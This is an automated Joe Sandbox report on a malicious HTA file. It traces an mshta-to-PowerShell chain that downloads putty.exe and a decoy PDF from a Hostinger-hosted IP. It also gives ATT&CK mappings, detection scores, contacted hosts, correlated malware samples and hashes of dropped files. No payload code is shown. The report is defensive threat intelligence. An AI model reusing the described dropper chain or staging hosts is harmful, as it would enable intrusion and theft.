Source: C:\Users\user\putty.exe Code function: 10_2_00447834 closesocket,socket,WSAGetLastError,setsockopt,setsockopt,setsockopt,htons,htonl,htons,bind,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError
MITRE ATT&CK Matrix, listed per tactic column (a leading number is the count badge the matrix shows with a matched technique; entries without a number are unmatched matrix placeholders)

Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 212 Command and Scripting Interpreter; 21 PowerShell; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 111 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; Compile After Delivery; Indicator Removal from Tools; Masquerading; Invalid Code Signature
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 12 System Time Discovery; 11 Peripheral Device Discovery; 1 Account Discovery; 2 File and Directory Discovery; 25 System Information Discovery; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: 1 Replication Through Removable Media; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: 1 Archive Collected Data; 1 Email Collection; 11 Input Capture; 12 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: 12 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
Behavior Graph (ID: 1320936; Sample: a913b6f2499bfbef318b948a278...; Startdate: 06/10/2023; Architecture: WINDOWS; Score: 92)

Sample level: DNS/IP the.earth.li | signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file

Process tree (indentation = started by; numbers in brackets are the count badges the graph attaches to a process, which its legend defines as number of created registry values / number of created files):
  mshta.exe [1] | signatures: Suspicious powershell command line found; Very long command line found
    powershell.exe [12] | signatures: Very long command line found; Drops PE files to the user root directory; Suspicious command line found; 2 other signatures
      cmd.exe [1] | signatures: Suspicious powershell command line found; Very long command line found
        powershell.exe [18 / 19] | DNS/IP: the.earth.li 93.93.131.124, local port 49709, remote port 80 (MYTHICMythicBeastsLtdGB, United Kingdom); 45.9.190.201, local port 49708, remote port 80 (AS-HOSTINGERLT, Germany) | dropped file: C:\Users\user\putty.exe (PE32)
          putty.exe | signatures: Contains functionality to modify clipboard data
          Acrobat.exe [20 / 56]
            AcroCEF.exe [66]
              AcroCEF.exe [4]
        powershell.exe [15]
        conhost.exe
      conhost.exe

Source | Detection | Scanner | Label
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | 21% | ReversingLabs | Script-WScript.Trojan.Valyria
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | 30% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\putty.exe | 0% | ReversingLabs |
C:\Users\user\putty.exe | 2% | Virustotal |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://45.9.190.201/Research.pdf | 0% | Avira URL Cloud | safe
http://www.chiark.greenend.org.uk/~sgtatham/putty/ | 1% | Virustotal |
http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj | 0% | Virustotal |
http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj | 0% | Avira URL Cloud | safe
http://www.chiark.greenend.org.uk/~sgtatham/putty/ | 0% | Avira URL Cloud | safe
http://crl.micro | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
the.earth.li | 93.93.131.124 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://45.9.190.201/Research.pdf | false | Avira URL Cloud: safe | unknown
http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.chiark.greenend.org.uk/~sgtatham/putty/ | putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.dr | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000005.00000002.1423096498.0000000007430000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj | putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
45.9.190.201 | unknown | Germany | 47583 | AS-HOSTINGERLT | false
93.93.131.124 | the.earth.li | United Kingdom | 44684 | MYTHICMythicBeastsLtdGB | false
                  Joe Sandbox Version:38.0.0 Ammolite
                  Analysis ID:1320936
                  Start date and time:2023-10-06 15:29:11 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 13s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
                  Detection:MAL
                  Classification:mal92.spyw.evad.winHTA@27/30@1/2
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 40
                  • Number of non-executed functions: 214
                  Cookbook Comments:
                  • Found application associated with file extension: .hta
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 184.28.98.93, 184.28.98.83
                  • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 4564 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 5292 because it is empty
• Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:30:07 | API Interceptor | 2x Sleep call for process: mshta.exe modified
15:30:07 | API Interceptor | 44x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
93.93.131.124 | doc.doc | malicious | Unknown | the.earth.li/~sgtatham/putty/latest/w64/putty.exe
93.93.131.124 | lmfao.doc | malicious | Unknown | the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
the.earth.li | client_1.hta | malicious | Unknown | 93.93.131.124
the.earth.li | client_3.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | Informazion.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | 827837hj.xls | malicious | Unknown | 93.93.131.124
the.earth.li | doc.doc | malicious | Unknown | 93.93.131.124
the.earth.li | https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi | malicious | Unknown | 93.93.131.124
the.earth.li | 1mixELaybY.exe | malicious | vkeylogger | 93.93.131.124
the.earth.li | smphost.dll | malicious | Unknown | 93.93.131.124
the.earth.li | #U043a#U043d#U043e#U043f#U043a#U0430.xlsm | malicious | Unknown | 93.93.131.124
the.earth.li | #U043a#U043d#U043e#U043f#U043a#U0430.xlsm | malicious | Unknown | 93.93.131.124
the.earth.li | #U043a#U043d#U043e#U043f#U043a#U0430.xlsm | malicious | Unknown | 93.93.131.124
the.earth.li | Microsoft Excel.xlsm | malicious | Unknown | 93.93.131.124
the.earth.li | Microsoft Excel.xlsm | malicious | Unknown | 93.93.131.124
the.earth.li | lmfao.doc | malicious | Unknown | 93.93.131.124
the.earth.li | YOeg64zDX4.exe | malicious | AZORult | 93.93.131.124
the.earth.li | payload.exe | malicious | Unknown | 93.93.131.124
the.earth.li | do7ZLDDsHX.xls | malicious | Unknown | 93.93.131.124
the.earth.li | m.doc | malicious | | 46.43.34.31
the.earth.li | m.doc | malicious | | 46.43.34.31
the.earth.li | m.doc | malicious | | 46.43.34.31

Match | Associated Sample Name / URL | Detection | Threat Name | Context
MYTHICMythicBeastsLtdGB | client_1.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | client_3.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | Informazion.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 827837hj.xls | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 7XlWWSA2LU.dll | malicious | Wannacry | 93.93.132.33
MYTHICMythicBeastsLtdGB | section_228_highways_agreement 34377.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | dfas_telework_agreement 20731.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | private_child_support_agreement_template 17845.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | making_a_contract_legally_binding_30040.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | illegalargumentexception_comparison_method_violates_its_general_contra 70051.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | electrical_contractor_agreement_template 5445.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | gootloader_stage1.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | difference_between_service_contract_and_employment_contract 98116.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | print_scheduling_agreement_sap 4874.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | chase_heloc_subordination_form 86327.js | malicious | Unknown | 46.235.226.209
MYTHICMythicBeastsLtdGB | doc.doc | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 1mixELaybY.exe | malicious | vkeylogger | 93.93.131.124
MYTHICMythicBeastsLtdGB | smphost.dll | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | arm7 | malicious | Mirai Moobot | 46.235.224.242
AS-HOSTINGERLT | https://www.businesstomark.com/google-sheets-vs-excel-a-comprehensive-face-off/ | malicious | Unknown | 185.210.145.9
AS-HOSTINGERLT | Deposit-Confirmation.Html | malicious | HTMLPhisher | 212.107.17.132
AS-HOSTINGERLT | BIN.exe | malicious | RedLine, WSHRAT | 194.59.164.67
AS-HOSTINGERLT | BUz0FElFiK.exe | malicious | Glupteba, Lu0Bot, PrivateLoader, RedLine, SmokeLoader | 45.130.231.6
AS-HOSTINGERLT | POWsPohDv9.exe | malicious | Fabookie, PrivateLoader, RedLine | 45.130.231.6
AS-HOSTINGERLT | a967rQFLum.exe | malicious | RedLine, WSHRAT | 194.59.164.67
AS-HOSTINGERLT | file.exe | malicious | Fabookie, Glupteba, PrivateLoader, RedLine, SmokeLoader | 45.130.231.6
AS-HOSTINGERLT | Somg Salary Update.html | malicious | HTMLPhisher | 193.46.198.232
AS-HOSTINGERLT | Salary Update.htm | malicious | Unknown | 193.46.198.232
AS-HOSTINGERLT | https://ymhlto.vitoriaregiabones.com.br/lgZI5Y.ei8jSc/YWRhcnJvd0BzZWNyZXN0ZGFycm93LmNvbQ== | malicious | Unknown | 31.170.163.184
AS-HOSTINGERLT | Sdk283724711.js | malicious | WSHRAT | 194.59.164.67
AS-HOSTINGERLT | 255-6887240_Thursday.html | malicious | HTMLPhisher | 156.67.222.22
AS-HOSTINGERLT | wp-contentplugins.hta | malicious | Unknown | 141.136.41.211
AS-HOSTINGERLT | Proforma_Invoice.exe | malicious | FormBook | 45.130.231.242
AS-HOSTINGERLT | DHL_Receipt_6015950460.exe | malicious | FormBook | 45.130.231.242
AS-HOSTINGERLT | UPS_CBJ190510700131.exe | malicious | FormBook | 45.130.231.242
AS-HOSTINGERLT | rNO10865687X54-Quote.exe | malicious | FormBook | 156.67.211.47
AS-HOSTINGERLT | http://cgsketchbook.com | malicious | Unknown | 141.136.33.45
AS-HOSTINGERLT | https://cgsketchbook.com/ | malicious | Unknown | 141.136.33.45
AS-HOSTINGERLT | https://cgsketchbook.com/ | malicious | Unknown | 141.136.33.45

No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\putty.exe | 82a7vPjX1R.exe | malicious | Unknown |
C:\Users\user\putty.exe | cgj6THyKZr.exe | malicious | Unknown |
C:\Users\user\putty.exe | putty.exe | malicious | |
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.172903269292124
                        Encrypted:false
                        SSDEEP:6:kw81W0uMq2PCHhJ2nKuAl9OmbnIFUtZ81wPWFZZmwj813AkwOCHhJ2nKuAl9Omb5:kvcfMvBHAahFUtCJZ/o656HAaSJ
                        MD5:1EF61F8F8AA8ECC1E47D757EE499B3F0
                        SHA1:59AC185E80B1875F033E90C9A5C40E46116D1A10
                        SHA-256:C0BFBAB02F5E3EAB7DBFB6C2758637FB7C56A92945FDF34A2BEFD04611070AAB
                        SHA-512:C73350BA14712B4961C8F0FF68EB004182D351F8C1A3A3937BC106270580CDE8E2DCB4BA329F95BAB5601E03A52E2E3319B2FD87878B0A9DFC0B831C132A7D24
                        Malicious:false
                        Preview:2023/10/06-15:30:12.439 1334 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/10/06-15:30:12.443 1334 Recovering log #3.2023/10/06-15:30:12.444 1334 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):338
                        Entropy (8bit):5.180674083863075
                        Encrypted:false
                        SSDEEP:6:kw83UQO3+q2PCHhJ2nKuAl9Ombzo2jMGIFUtZ83gZZmwj83GO3VkwOCHhJ2nKuAv:kv3UQ7vBHAa8uFUtC3M/o3GS56HAa8RJ
                        MD5:75A58D0B928176856C2203A5568A3F56
                        SHA1:662EB1A9E2C3F20E8B39CB1D8639B79FC1E0FCE0
                        SHA-256:26E3F70756F9BD798575124D084E38A19046B1917D7FB5DB06574D51089C0472
                        SHA-512:6D2CD7473153AC7917CC34D2CC33EC2D3DE849F78EB6240A87E7D67A74D64117DF4DEEEF4C037E5B8E1DD3687BB2425C067D92879F0A5DBB33AFECB16F7B0B47
                        Malicious:false
                        Preview:2023/10/06-15:30:12.615 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2023/10/06-15:30:12.626 17c8 Recovering log #3.2023/10/06-15:30:12.627 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):443
                        Entropy (8bit):4.963680680732697
                        Encrypted:false
                        SSDEEP:12:YH/um3RA8sqp9WsBd2caq3QYiub6P7E4T3y:Y2sRdss97dJ3QYhbS7nby
                        MD5:F3263785E69E59670A632A7BE2FA66CB
                        SHA1:53D599416DA419651EE082C6D47FD91D339553B4
                        SHA-256:C1257B3032C741BE40C7385B12508DAA0A83A3B776264F426971DAF064559A39
                        SHA-512:3F5A11C3D2C6F2663E704DD0825B71074C4DAD1B43D59FA0D8FEF5FC79A2ACC3A5A984C654A26C530B7978F090C9268029A91DDA1265855E0190770D71838132
                        Malicious:false
                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341159018430278","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3758
                        Entropy (8bit):5.23569418637398
                        Encrypted:false
                        SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+b59ulp:S43C4mS7fFi0KFYDjr3LWO3V3aw+b59u
                        MD5:D13474303B0C55E7763896143D52E12A
                        SHA1:61F460C4DB05839D78E736DFFEABB20151B73D27
                        SHA-256:F9B000D0E34BC7F189E719AD0226E7DF161776823DDA53D47448A1FFB4DD23C0
                        SHA-512:E8C4E99782E9536ED534EE1D39EB252C658CD7363A3A7E5F85811BC39202C52EA3E12768EDD4554A93F17880010AFB47DE04D1E262E4B96251C2E12FDF1B3CCD
                        Malicious:false
                        Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):5.228348841997223
                        Encrypted:false
                        SSDEEP:6:kw83cQ+q2PCHhJ2nKuAl9OmbzNMxIFUtZ83cCKXZmwj83cmNVkwOCHhJ2nKuAl9c:kv3cVvBHAa8jFUtC3cCKX/o3cu56HAab
                        MD5:B855BA5629E9844F22DFDF9771613E9A
                        SHA1:98C3343681CC7048C5C3B101F33664790E1A1A80
                        SHA-256:4B48E7D66FFDBE5BD43D9FFD5A90B22B86E7CCD3507630FD43DF9504192D69C3
                        SHA-512:6D52087EB945BB244B30B2E87A0B5EF2F9C6317DCF05D2C97CD859402968CA1B9A2EB2BE9B9F61AF861334C6E95A9CAB2382E551C2FEA7B99F4E44EDE1421C5D
                        Malicious:false
                        Preview:2023/10/06-15:30:12.692 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2023/10/06-15:30:12.693 17c8 Recovering log #3.2023/10/06-15:30:12.694 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                        Category:dropped
                        Size (bytes):65110
                        Entropy (8bit):0.48635237317427504
                        Encrypted:false
                        SSDEEP:96:0WMT6IMM7MMXEMDiMmMMMMmgEMLBMMl+RME4vdMedH1XrJMMkAMM7MPMXEMMIM7m:hXoi
                        MD5:A0F86A5B7FA5F39CDE2976A38F97E73C
                        SHA1:1A7B07C75E74F69999AE931CEB27F50495EB1617
                        SHA-256:BF5F8C4110B4EECFDED26441BACB7C186AAE9E36676B2814E442ABCA18D69BE3
                        SHA-512:5D2E9159D574FD858F7C028863F4619B792EECC6D30CC1B6245722D22917D45F266ED672DE7710198A4F6E036C767BF42B15E142BB93A0C0FC56A234CA720C65
                        Malicious:false
                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):2818
                        Entropy (8bit):5.135790972452514
                        Encrypted:false
                        SSDEEP:48:Y392PRnkGM9iL2GBo+cIYH8TFSGTFXwiTFgCTF3bTFDL0ToT3UTpNMaTpTqt:Lmi2ZhoJLWNMF
                        MD5:CB52A0592156CFC8E760FED0EF27424C
                        SHA1:91D66431DB015B2B98E7A3E59FE1EE70D699E82F
                        SHA-256:D88CD4196D0C6A7CBDAA22C1D82AB07AC2B8593EF222E76C6B04845670F23A6F
                        SHA-512:3F01885E9119900780D1E7FE84FD465318C08393288CC42488957AFBBB1880CFAE2F56CE95BFF86646790D9A3EF8E0611B3EF274F5434FB622F6748D9F8B64D9
                        Malicious:false
                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1a6c845034c91b8f895804fd80befd78","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696599016000},{"id":"DC_Reader_Upsell_Cards","info":{"dg":"2ca0b88a5bc53890610b00eac8c57ce9","sid":"DC_Reader_Upsell_Cards"},"mimeType":"file","size":5220,"ts":1696599015000},{"id":"ACROBAT_READER_MASTER_SURFACEID","info":{"dg":"957fa9d2cf63e4c067ef7c9e4a53f7ae","sid":"ACROBAT_READER_MASTER_SURFACEID"},"mimeType":"file","size":295,"ts":1696599015000},{"id":"DC_READER_LAUNCH_CARD","info":{"dg":"687283e6717694573802efbe731a3a4f","sid":"DC_READER_LAUNCH_CARD"},"mimeType":"file","size":285,"ts":1696599015000},{"id":"DC_FirstMile_Home_View_Surface","info":{"dg":"5560557b9a764cced788f1f77c329767","sid":"DC_FirstMile_Home_View_Surface"},"mimeType":"file","size":294,"ts":1696599015000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1f627a0ebb1619d115b1670685dc36d6","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):1.3177303870386765
                        Encrypted:false
                        SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeJ2tqVpq:TGufl2GL7ms9WR1CPmPbPahJIypilI3O
                        MD5:E5EEEC49827599EB7829B8E5C02E0C2B
                        SHA1:28244CB502F5107DDE6F08FA15C08D0B4493A23C
                        SHA-256:256208414725D0E3C9DA21B02FFECAF37419472EF436DE870F4A6A39A5456E1B
                        SHA-512:AD513738490D30832C6DDB818E909EEEF6AE95379DEBAF4128325CA258D31A87D7D8B68702FB32D03B573C186B31336258783AD6F4CEB294E8C874ABC7ADB11E
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite Rollback Journal
                        Category:dropped
                        Size (bytes):8720
                        Entropy (8bit):1.7804664584116694
                        Encrypted:false
                        SSDEEP:24:7+tAlhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeJ24qVpaVrScVr0InzqLhx/p:7MnWR1CPmPbPahJ9ypilISqFl2GL7ms7
                        MD5:EE3ABF60E3C9F89FA1762DEC78927672
                        SHA1:D3473FC31B0FE8A5932CA54F56ADA02546715314
                        SHA-256:1BD4313973D83286C78C0D46BDB9D251A9825026F08D8BFE5A5FE25AB9347C82
                        SHA-512:A123BA4FBF6E45FD17A6DD810ED43863FAA3A8A04564A9609814D7445E21609FA59AF5AAC90A5B8B4A44A7CF5A49EF0FC58A5D33D593110AF7E8FFB308A5BFA1
                        Malicious:false
